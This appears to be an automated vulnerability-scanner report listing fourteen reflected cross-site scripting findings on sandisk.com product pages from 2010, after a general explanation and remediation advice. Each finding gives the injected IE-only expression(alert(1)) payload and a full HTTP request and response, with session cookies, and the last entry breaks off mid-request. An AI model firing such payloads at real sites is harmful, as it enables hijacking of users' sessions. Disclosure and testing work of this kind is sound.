Cross Site Scripting Reports | Hoyt LLC Research

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.sandisk.com/products/camcorder/sandisk-extreme-hd-video-sdhc-cards [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/camcorder/sandisk-extreme-hd-video-sdhc-cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd5f5"style%3d"x%3aexpression(alert(1))"eef9f69184a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd5f5"style="x:expression(alert(1))"eef9f69184a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/camcorder/sandisk-extreme-hd-video-sdhc-cards?fd5f5"style%3d"x%3aexpression(alert(1))"eef9f69184a=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31491
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/camcorder/sandisk-extreme-hd-video-sdhc-cards?fd5f5"style="x:expression(alert(1))"eef9f69184a=1?tab=review">
...[SNIP]...

1.2. http://www.sandisk.com/products/camcorder/sandisk-video-hd-sdhc [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/camcorder/sandisk-video-hd-sdhc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f513a"style%3d"x%3aexpression(alert(1))"a5e6149afe5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f513a"style="x:expression(alert(1))"a5e6149afe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/camcorder/sandisk-video-hd-sdhc?f513a"style%3d"x%3aexpression(alert(1))"a5e6149afe5=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30609
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/camcorder/sandisk-video-hd-sdhc?f513a"style="x:expression(alert(1))"a5e6149afe5=1?tab=review">
...[SNIP]...

1.3. http://www.sandisk.com/products/computing-products/sandisk-cruzer-blade-usb-flash-drive [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/computing-products/sandisk-cruzer-blade-usb-flash-drive

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1f21"style%3d"x%3aexpression(alert(1))"88ec6cb3187 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1f21"style="x:expression(alert(1))"88ec6cb3187 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/computing-products/sandisk-cruzer-blade-usb-flash-drive?b1f21"style%3d"x%3aexpression(alert(1))"88ec6cb3187=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30910
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/computing-products/sandisk-cruzer-blade-usb-flash-drive?b1f21"style="x:expression(alert(1))"88ec6cb3187=1?tab=review">
...[SNIP]...

1.4. http://www.sandisk.com/products/computing-products/sandisk-solid-state-drive [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/computing-products/sandisk-solid-state-drive

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5318"style%3d"x%3aexpression(alert(1))"90dcaea1c6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5318"style="x:expression(alert(1))"90dcaea1c6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/computing-products/sandisk-solid-state-drive?e5318"style%3d"x%3aexpression(alert(1))"90dcaea1c6b=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 52921
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/computing-products/sandisk-solid-state-drive?e5318"style="x:expression(alert(1))"90dcaea1c6b=1?tab=review">
...[SNIP]...

1.5. http://www.sandisk.com/products/computing-products/sandisk-ultra-backup-usb-flash-drive [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/computing-products/sandisk-ultra-backup-usb-flash-drive

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce901"style%3d"x%3aexpression(alert(1))"55ab8ce19e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce901"style="x:expression(alert(1))"55ab8ce19e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/computing-products/sandisk-ultra-backup-usb-flash-drive?ce901"style%3d"x%3aexpression(alert(1))"55ab8ce19e3=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53892
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/computing-products/sandisk-ultra-backup-usb-flash-drive?ce901"style="x:expression(alert(1))"55ab8ce19e3=1?tab=review">
...[SNIP]...

1.6. http://www.sandisk.com/products/dslr/sandisk-extreme-compactflash-card [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-compactflash-card

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4afb2"style%3d"x%3aexpression(alert(1))"4d88f248f5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4afb2"style="x:expression(alert(1))"4d88f248f5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-extreme-compactflash-card?4afb2"style%3d"x%3aexpression(alert(1))"4d88f248f5c=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33131
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-extreme-compactflash-card?4afb2"style="x:expression(alert(1))"4d88f248f5c=1?tab=review">
...[SNIP]...

1.7. http://www.sandisk.com/products/dslr/sandisk-extreme-iv-compactflash [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-iv-compactflash

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2325d"style%3d"x%3aexpression(alert(1))"b1252f74294 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2325d"style="x:expression(alert(1))"b1252f74294 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-extreme-iv-compactflash?2325d"style%3d"x%3aexpression(alert(1))"b1252f74294=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31929
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-extreme-iv-compactflash?2325d"style="x:expression(alert(1))"b1252f74294=1?tab=review">
...[SNIP]...

1.8. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-pro-compactflash-card

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13d2c"style%3d"x%3aexpression(alert(1))"6a479bce8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13d2c"style="x:expression(alert(1))"6a479bce8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-extreme-pro-compactflash-card?13d2c"style%3d"x%3aexpression(alert(1))"6a479bce8d=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33658
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card?13d2c"style="x:expression(alert(1))"6a479bce8d=1?tab=review">
...[SNIP]...

1.9. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-pro-compactflash-card.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6d55"style%3d"x%3aexpression(alert(1))"8670393045b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6d55"style="x:expression(alert(1))"8670393045b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-extreme-pro-compactflash-card.aspx?c6d55"style%3d"x%3aexpression(alert(1))"8670393045b=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33670
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card.aspx?c6d55"style="x:expression(alert(1))"8670393045b=1?tab=review">
...[SNIP]...

1.10. http://www.sandisk.com/products/dslr/sandisk-extreme-sdhc-cards- [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-sdhc-cards-

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d221"style%3d"x%3aexpression(alert(1))"d8dcded1d4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d221"style="x:expression(alert(1))"d8dcded1d4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-extreme-sdhc-cards-?5d221"style%3d"x%3aexpression(alert(1))"d8dcded1d4d=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33305
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-extreme-sdhc-cards-?5d221"style="x:expression(alert(1))"d8dcded1d4d=1?tab=review">
...[SNIP]...

1.11. http://www.sandisk.com/products/dslr/sandisk-ultra-compact-flash [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-ultra-compact-flash

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8282e"style%3d"x%3aexpression(alert(1))"f95629108dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8282e"style="x:expression(alert(1))"f95629108dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-ultra-compact-flash?8282e"style%3d"x%3aexpression(alert(1))"f95629108dc=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32839
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-ultra-compact-flash?8282e"style="x:expression(alert(1))"f95629108dc=1?tab=review">
...[SNIP]...

1.12. http://www.sandisk.com/products/dslr/sandisk-ultra-ii-compactflash [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-ultra-ii-compactflash

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f68c2"style%3d"x%3aexpression(alert(1))"c30b6badd95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f68c2"style="x:expression(alert(1))"c30b6badd95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-ultra-ii-compactflash?f68c2"style%3d"x%3aexpression(alert(1))"c30b6badd95=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32727
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:44:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-ultra-ii-compactflash?f68c2"style="x:expression(alert(1))"c30b6badd95=1?tab=review">
...[SNIP]...

1.13. http://www.sandisk.com/products/dslr/sandisk-ultra-sdhc [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-ultra-sdhc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 417ed"style%3d"x%3aexpression(alert(1))"28642bf6833 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 417ed"style="x:expression(alert(1))"28642bf6833 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-ultra-sdhc?417ed"style%3d"x%3aexpression(alert(1))"28642bf6833=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34306
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-ultra-sdhc?417ed"style="x:expression(alert(1))"28642bf6833=1?tab=review">
...[SNIP]...

1.14. http://www.sandisk.com/products/dslr/sandisk-ultra-sdxc-cards [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-ultra-sdxc-cards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c301f"style%3d"x%3aexpression(alert(1))"2ab41aca7da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c301f"style="x:expression(alert(1))"2ab41aca7da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/dslr/sandisk-ultra-sdxc-cards?c301f"style%3d"x%3aexpression(alert(1))"2ab41aca7da=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
